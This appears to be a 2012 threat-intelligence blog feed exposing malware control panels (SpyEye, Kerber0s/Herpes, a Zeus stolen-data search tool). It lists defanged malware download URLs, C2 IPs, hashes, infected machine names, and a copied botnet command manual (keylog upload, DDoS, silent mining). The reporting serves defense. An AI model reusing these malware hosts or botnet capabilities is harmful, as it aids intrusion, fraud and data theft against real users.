23:51:50] ADMIN-PC_74DEB1E3F090E324, p1=17688 ,p2=31963<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[05.09.2012
17:37:08] DIAL_INT-PC_E532648A8AFF5F32, p1=15504 ,p2=35943<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[05.09.2012
17:38:35] LUIS-4E3325EABE_B4DF7611605FA143, p1=11689 ,p2=29435<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[06.09.2012
13:53:25] RAULSISTEMAS_4983EC5A2711C179, p1=12665 ,p2=24109<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[06.09.2012
13:55:15] CARLOS_7875768F483EE109, p1=18871 ,p2=25181<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[06.09.2012
13:55:49] JAVIER_B4DF7611483EE109, p1=11475 ,p2=26807<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[06.09.2012
13:56:24] OMARVAZQUEZ_1CB98D876522DF69, p1=15011 ,p2=31385<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[06.09.2012
13:57:45] PUESTOV_4983EC5ACB9AD960, p1=19115 ,p2=34960<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[07.09.2012
15:47:07] SHXP2364_7875768F7E657C89, p1=14409 ,p2=36871<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[07.09.2012
15:48:23] PERSONAL_74DEB1E387314069, p1=10806 ,p2=34226<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[07.09.2012
15:48:34] PC-JAVIER_7875768FEABD3289, p1=17728 ,p2=36485<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[07.09.2012
15:49:00] DIAGONALMARLIM1_4A073834B2FFEE74, p1=18676 ,p2=28923<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: xx-small;">[07.09.2012
15:50:10] ANA-MARI-THINK_74DEB1E315C0DF75, p1=19752 ,p2=37007</span><span style="font-size: x-small;"><o:p></o:p></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Se observa
como esta lista contiene principalmente usuarios de origen español que
habrán sido victimas de fraude en sus cuentas bancarias por Internet.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Actualmente
se han localizado varios servidores conteniendo esta infraestructura criminal:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://95.77.98.137/
alojado en el proveedor UPC Romania BUCURESTI B2B MPLS de Rumania<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-PgwOkcP7FGo/UME6lI7vY4I/AAAAAAAAATM/Y30acO9vovY/s1600/vnc4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://1.bp.blogspot.com/-PgwOkcP7FGo/UME6lI7vY4I/AAAAAAAAATM/Y30acO9vovY/s400/vnc4.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://www.wanderbaresdeutschland.de/
alojado en <st1:personname productid="la IP" w:st="on">la IP</st1:personname>
85.214.116.67 perteneciente al proveedor stratoserver.net de Alemania<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-wLngDupxMTI/UME7RXRIa3I/AAAAAAAAATs/i5oEodbzVHY/s1600/vnc5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://2.bp.blogspot.com/-wLngDupxMTI/UME7RXRIa3I/AAAAAAAAATs/i5oEodbzVHY/s640/vnc5.jpg" width="531" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"> </span><span style="font-family: Arial; font-size: 11pt;">hXXp://46.166.129.65/
alojado en el proveedor SANTREX-INTERNET-SERVICES de UK</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-62257733227456644612012-11-20T07:56:00.000-08:002012-11-20T07:56:36.847-08:00Troyan SPYEYE against users from the Balkans Republics<br />
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">Has been
identified a criminal infrastructure of Troyan SpyEye Control Panel prepared to steal confidential
data from users of the Balkan republics.<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">This server
is hosted on IP 91.220.35.45 belongs to ZAMANHOST-NET provider of Romania. This
IP also resolves fraudulent domains prontomentos.com, soledantos.com, patentpendingnotetaker.net
y rontomentos.com<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">The
connection string that infected computers communicate with Troyan Control Panel
is:<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">hXXp://91.220.35.45/forum.php</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Ni0hb7TUJuQ/UKummUZuaiI/AAAAAAAAASM/V1XsjNuUFiw/s1600/conexion.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="http://4.bp.blogspot.com/-Ni0hb7TUJuQ/UKummUZuaiI/AAAAAAAAASM/V1XsjNuUFiw/s400/conexion.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">Trojan
Control Panel is accessed via URL:<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">hXXp://91.220.35.45/kurcina123/<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-mnmIpBpuAaI/UKumtEqkZUI/AAAAAAAAASU/qRnmp_O7NyI/s1600/panel.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="http://4.bp.blogspot.com/-mnmIpBpuAaI/UKumtEqkZUI/AAAAAAAAASU/qRnmp_O7NyI/s400/panel.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><span lang="EN-US">The “kurcina”
Word means “</span><span lang="EN-US">A really big di*k” in Serbian language.<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><span lang="EN-US"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">This
control panel incorporates 2 new modules in its functionality.<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">The
plugging "E-Mail Grabber":<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-olpRVIYAS8M/UKum84t8H2I/AAAAAAAAASc/79pspAF4A-c/s1600/mails.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="357" src="http://4.bp.blogspot.com/-olpRVIYAS8M/UKum84t8H2I/AAAAAAAAASc/79pspAF4A-c/s400/mails.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">This module
is active from 11/05/2012 and has collected more 159.288 e-mail addresses, most
from computer users of Slovenia, Bosnia and Herzegovina and other Balkan
republics<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">The other
New plugging is the "FTP Grabber":<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-yKqwONN8YXI/UKun3dXTeGI/AAAAAAAAASk/BKEl6UHoyJI/s1600/ftp.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="http://1.bp.blogspot.com/-yKqwONN8YXI/UKun3dXTeGI/AAAAAAAAASk/BKEl6UHoyJI/s400/ftp.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;">If access
the statistical panel module can be seen as criminals are primarily interested
in collecting private data from email accounts and social networks of users,
which means that this panel has been created mainly for the purpose of
espionage and intelligence gathering on the profiles and behavior patterns of
users of the Balkan republics.</span><o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-qVgvipLRh0c/UKun-AUM6dI/AAAAAAAAASs/UXGk0zA29yw/s1600/hosts.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="385" src="http://3.bp.blogspot.com/-qVgvipLRh0c/UKun-AUM6dI/AAAAAAAAASs/UXGk0zA29yw/s400/hosts.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-92030313433476054202012-11-09T14:16:00.000-08:002012-11-09T14:16:11.996-08:00Kerber0s Bot Panel<br />
<span style="font-family: Arial, Helvetica, sans-serif;">has been found a new botnet called "Kerber0s Bot Panel". This control panel is hosted at IP 46.166.163.127 belonging at the Provider INTERNET-SERVICES SANTREX in Romania</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">The Malware infection vector is downloaded from the address:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">hxxp://46.166.163.127/1.exe</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Size: 489,472</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">MD5: e3954dfb5e35eb32c02530838fa8d4c9</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">&</span><br />
<div class="MsoNormal">
<span style="font-family: Arial;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;">hXXp://
46.166.163.127/images/support/uTorrent.exe<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">Size: 896400</span></div>
<div class="MsoNormal">
<span style="font-family: Arial;">MD5:
59fe95f7fede6d69c007e2cd05356f07<o:p></o:p></span></div>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">The Control Panel Access Menu is located at URL: hxxp://46.166.163.127/login.php</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-HyyGSiFd9Js/UJ17ACYuNJI/AAAAAAAAARU/9vFDCjCxEKE/s1600/kerber0s.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="http://3.bp.blogspot.com/-HyyGSiFd9Js/UJ17ACYuNJI/AAAAAAAAARU/9vFDCjCxEKE/s400/kerber0s.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-xBF5chX5mWo/UJ17HWhjjqI/AAAAAAAAARc/rfGxoNvyenw/s1600/shell.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="http://3.bp.blogspot.com/-xBF5chX5mWo/UJ17HWhjjqI/AAAAAAAAARc/rfGxoNvyenw/s400/shell.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div>
<div class="MsoNormal">
<span class="hps"><span lang="EN" style="color: #333333; font-family: Arial; mso-ansi-language: EN;">The commands That can</span></span><span lang="EN" style="color: #333333; font-family: Arial; mso-ansi-language: EN;"> <span closure_uid_ksj11u="1351"><span class="hps">run this</span></span> <span closure_uid_ksj11u="1352"><span class="hps">botnet</span></span> at infected machines <span closure_uid_ksj11u="1353"><span class="hps">are the same as</span></span> <span closure_uid_ksj11u="1354"><span class="hps">used by the</span></span> <span closure_uid_ksj11u="1355"><span class="hps">Botnet</span></span> <span closure_uid_ksj11u="1356"><span class="hps">Herpes</span></span><span closure_uid_ksj11u="1357">:</span></span></div>
<div class="MsoNormal">
<span lang="EN" style="color: #333333; font-family: Arial; mso-ansi-language: EN;"><span closure_uid_ksj11u="1357"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN" style="color: #333333; font-family: Arial; mso-ansi-language: EN;"><span closure_uid_ksj11u="1357"></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Commands:</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Download/Execute: Download and execute the specified file.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = The URL of the file to be
downloaded.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Update: Download and update.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = The URL of the file to be
downloaded and updated.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Visit Page [Visible]: Open the default browser and visits
the specified webpage.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = The URL of the page to be
visited.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Visit Page [Invisible]: Open Internet Explorer silently and
visits the specified webpage.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = The URL of the page to be
visited.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Upload Keylog: Sends the keylogger log to our server and you
will be able to download it</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">from the Bot Informations page. Attention, every uploaded
file will rest there for 15 minutes, and after will be deleted.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = Nothing.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Reset Keylog: Clears the key log.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = Nothing.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Upload Screenshot: Take a screenshot and sends to our server
and you will be able to download it</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">from the Bot Informations page. Attention, every uploaded
file will rest there for 15 minutes, and after will be deleted.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">. What to put in the variable box = Nothing.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Upload Error Log: Sends the Error Log to our server and you
will be able to download it</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">from the Bot Informations page. Attention, every uploaded
file will rest there for 15 minutes, and after will be deleted.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = Nothing.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">DDoS Webpage: Sends a request to the specified webpage for
60 seconds</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">(Please note that the bot will not execute commands for 60
seconds because is DDoSing. An high amount of selected online bots will crash
the webserver).</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = The webpage to be
requested.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Silent CPU&GPU Bitcoin Miner: Start to use your bots to
make a lot of bitcoins.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box =
http://workerusername:workerpassword@poolhost:poolport</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Example: http://lollipop:byebye@pool.bitclockers.com:8332</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Tip: For disabling mining just send this command with the
variable box empty.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Torrent Seeder v2.5+: Start to use your bots to seed your
torrent for you.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = The url of the .torrent
file to be downloaded</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Example: http://www.mywebsite/download.torrent</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Open and Close CD Tray v2.5.1+: Just opens or closes the CD
tray.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = Nothing.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Message Box v2.5.1+: Spawn a message box on the screen.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = The message to send.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Swap and Restore Mouse Buttons v2.5.1+: Swaps or return to
normal the mouse buttons.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = Nothing.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Uninstall: Remove Herpes from the system.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">What to put in the variable box = Nothing.</span></div>
<br />
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN"><span closure_uid_ksj11u="1357"><span style="color: #333333; font-family: Arial;"></span></span></span></div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial;">In this criminal server infrastructure has been located the control panel "CASHMARKET AFFILIATE" that is the same botnet that the known Blackshades botnet but modified.</span></div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial;"><br /></span></div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial;">This control panel is accessed by malicious URL: hxxp://46.166.163.127/bs/</span></div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial;"><br /></span></div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial;">Criminals have not changed even the installation folder "BS" feature at BlackShade kit</span></div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial;"><br /></span></div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: #333333; font-family: Arial;"><a href="http://2.bp.blogspot.com/-YHtIPvgtVxU/UJ19nTKQsSI/AAAAAAAAAR0/bD5FAYKUkrM/s1600/CASHMARKET.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="303" src="http://2.bp.blogspot.com/-YHtIPvgtVxU/UJ19nTKQsSI/AAAAAAAAAR0/bD5FAYKUkrM/s400/CASHMARKET.jpg" width="400" /></a></span></div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial;"><br /></span></div>
</div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-65294855090945980762012-10-30T04:38:00.000-07:002012-10-30T04:38:14.987-07:00Control Panel for data mining information from repositories of banker Zeus TroyansIt has been found a new Control Panel focus to query and extract data from repositories of banker Troyans Zeus family and its variants. Like a data mining application is able to connect to different databases repositories that store data stolen by Troyans and search required data using regular expressions.<br />
<br />
<br />
Access to the Control Panel shows the next information.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-68C5iLxuNFM/UI6YqIJb5sI/AAAAAAAAAQc/2O0AZ6_RUwo/s1600/1-Modified.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="247" qea="true" src="http://3.bp.blogspot.com/-68C5iLxuNFM/UI6YqIJb5sI/AAAAAAAAAQc/2O0AZ6_RUwo/s400/1-Modified.JPG" width="400" /></a></div>
<br />
This method provides the advantage to criminals of being directly connected to remote databases that contain confidential information from compromised users without having to access the Control Panels where hosted data repositories are. Queries are performed directly on the databases without having to interfere at any time with the operation of the control panel that manages all botnets or zombie machines.<br />
<br />
Of this way criminals also avoid leaving traces in web servers every time they have to perform some operation on the captured data leaving no traces in the log files of the web server.<br />
<br />
Connection to the databases from Troyan Control Panel is quite simple.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-RWmD43gMe-4/UI6Y2cmaXOI/AAAAAAAAAQk/SyPc2IwJy6k/s1600/1-b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" qea="true" src="http://3.bp.blogspot.com/-RWmD43gMe-4/UI6Y2cmaXOI/AAAAAAAAAQk/SyPc2IwJy6k/s320/1-b.jpg" width="320" /></a></div>
<br />
In the Control Panel settings is configure the connection strings of database where the troyan’s repository is stored and Troyan class which wants to extract the information to analysis and process.<br />
<br />
Troyan clasees with the application works are: Carbep, Citadel, Ice9, SpyEye, Zeus 1.1 Zeus 1.2 & Zeus2.<br />
<br />
All these Troyans are different in their performance but retain many similarities in the manner in which the stolen information is stored in its databases and this Control Panel tools able to adapt to the structure of each Troyan database.<br />
<br />
The data search engine in repositories is based on the powerful capacity of regular expressions, This seach engine is visible at next screen.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Kuh8El10Rbo/UI6ZDBqLZJI/AAAAAAAAAQs/rKgcOtf9ePA/s1600/1-c.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" qea="true" src="http://4.bp.blogspot.com/-Kuh8El10Rbo/UI6ZDBqLZJI/AAAAAAAAAQs/rKgcOtf9ePA/s400/1-c.jpg" width="400" /></a></div>
<br /><br />
In this example created by default in the control panel, you can see the regular expression that should be used to locate at Troyan data repository all stolen access credentials that comply the defined format "user/ password" for accessing the legitimate websites of Paypal and Ebay<br />
<br />
These regular expressions allow to search at full Troyan database robbed data users by defining variables names of stored passwords or any data that wish to find<br />
<br />
With regular expressions is possible to define any text searchable format, such as email addresses, dates, passport numbers, social security numbers, etc. The possibilities are endless.<br />
<br />
Is possible even to create search templates and store it for future actions.<br />
<br />
The search engine also allows multiples search options, like searching by zombie machines IDs, URLs and even post data captured by users mails headers.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-ksaUcBUV0Bg/UI6ZTLBGvxI/AAAAAAAAAQ0/cVoRAfuqBAA/s1600/1-d.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="113" qea="true" src="http://1.bp.blogspot.com/-ksaUcBUV0Bg/UI6ZTLBGvxI/AAAAAAAAAQ0/cVoRAfuqBAA/s400/1-d.jpg" width="400" /></a></div>
<br />
There is even an automated module for searching confidential information of credit cards, in this module you can specify search key fields as the CVV code of the credit card or using the Luhn algorithm.<br />
<br />
The Luhn algorithm or "algorithm module 10" is a formula checksum used to validate the identification numbers of credit cards.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-oxcpHN2Lv_Y/UI6ZaNyYR9I/AAAAAAAAAQ8/OYL7bu1Eim0/s1600/1-cards.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="52" qea="true" src="http://3.bp.blogspot.com/-oxcpHN2Lv_Y/UI6ZaNyYR9I/AAAAAAAAAQ8/OYL7bu1Eim0/s400/1-cards.jpg" width="400" /></a></div>
<br />
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-38468005597095576422012-10-29T08:00:00.000-07:002012-10-29T08:06:12.624-07:00Panel de extracción de datos de repositorios Troyanos bancarios ZEUSSe ha localizado un nuevo Panel de Control orientado para la consulta y extracción de datos de los repositorios de los troyanos bancarios de la familia Zeus y sus variantes. Como si se tratará de una aplicación de minería de datos es capaz de conectarse a diferentes bases de datos que utilizan como repositorios de datos robados los troyanos y realizar búsquedas mediante expresiones regulares de los datos deseados.<br />
<br />
<br />
El acceso al Panel de Control muestra la siguiente información.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-68C5iLxuNFM/UI6YqIJb5sI/AAAAAAAAAQc/2O0AZ6_RUwo/s1600/1-Modified.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="398" qea="true" src="http://3.bp.blogspot.com/-68C5iLxuNFM/UI6YqIJb5sI/AAAAAAAAAQc/2O0AZ6_RUwo/s640/1-Modified.JPG" width="640" /></a></div>
